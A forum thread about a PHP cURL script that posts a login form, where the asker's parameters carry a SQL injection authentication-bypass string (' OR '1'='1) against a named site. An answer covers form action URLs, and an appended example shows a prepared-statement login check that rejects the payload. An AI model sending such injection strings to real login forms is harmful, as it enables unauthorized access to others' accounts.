I’m simply trying to automatically log in to a login form via PHP and cURL.
I have:
<?php
# get url to form
$url = "http://thesite.com/login.php";
$ch = curl_init($url); # initialize that form
#run value of $_POST variable in form fields from above url.
$params = "username='' OR '1'='1&password='' OR '1'='1&login-php-submit-button=submit";
## set cURL options
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params); #set parameter $_POST fields
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (!$response) {
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch); // make sure we close any current curl sessions
    die(stripslashes($http_code.' Can\'t connect to server.'));
}
//curl_close($ch); // close curl session
## echo the result from cURL 'ing
echo $response;
curl_close($ch);
?>
When I visit this script it just shows the value of $url as if I just visited the URL; it doesn't show any error messages like “Wrong pass” or anything.
I feel like $params may not be set up correctly here. I have tried relentlessly to get this to work. I currently have it set up where the $params values are:
formnameofinputvalue=valueToInputIntoFormElement&
where & separates each formInputName=formInputValue
Anyone see what I am doing wrong here? Thank you.
Does the login.php script submit the values to another URL? Check the source for the login.php page and see if the form is submitting to another URL (action= in the form element). If so, you will want to use that URL instead since that is where the values are being submitted. The login.php is only the form to collect the values.
On the other hand, login.php might submit to itself, in which case you have the right URL.
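The $params string in the question puts ' OR '1'='1 into both the username and password fields. As an added example (not code from the original post or from the site it mentions), here is a login check that binds the username as a query parameter and verifies the password against a stored hash, so the submitted values are handled as ordinary strings. The users table, the alice account and the check_login helper are assumptions, and the script needs the pdo_sqlite extension.

```php
<?php
// Added example. Constructed in-memory user table; all names are assumptions.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');

$ins = $pdo->prepare('INSERT INTO users (username, password_hash) VALUES (:u, :h)');
$ins->execute([':u' => 'alice', ':h' => password_hash('correct horse', PASSWORD_DEFAULT)]);

/**
 * Hypothetical login handler: returns true only for a known user with the right password.
 */
function check_login(PDO $pdo, array $post): bool
{
    $user = $post['username'] ?? '';
    $pass = $post['password'] ?? '';

    // Form fields can arrive as arrays (username[]=x); accept strings only.
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }

    // The username is bound as data, so quotes in it never reach the SQL parser.
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();

    // The password is never placed in SQL at all; it is checked against the hash.
    return is_string($hash) && password_verify($pass, $hash);
}

// The POST body from the question, decoded the way PHP fills $_POST.
$body = "username='' OR '1'='1&password='' OR '1'='1&login-php-submit-button=submit";
parse_str($body, $post);

echo "fields received:\n";
var_dump($post['username'], $post['password']);

echo "body from the question accepted: ";
var_dump(check_login($pdo, $post));

echo "constructed valid credentials accepted: ";
var_dump(check_login($pdo, ['username' => 'alice', 'password' => 'correct horse']));
```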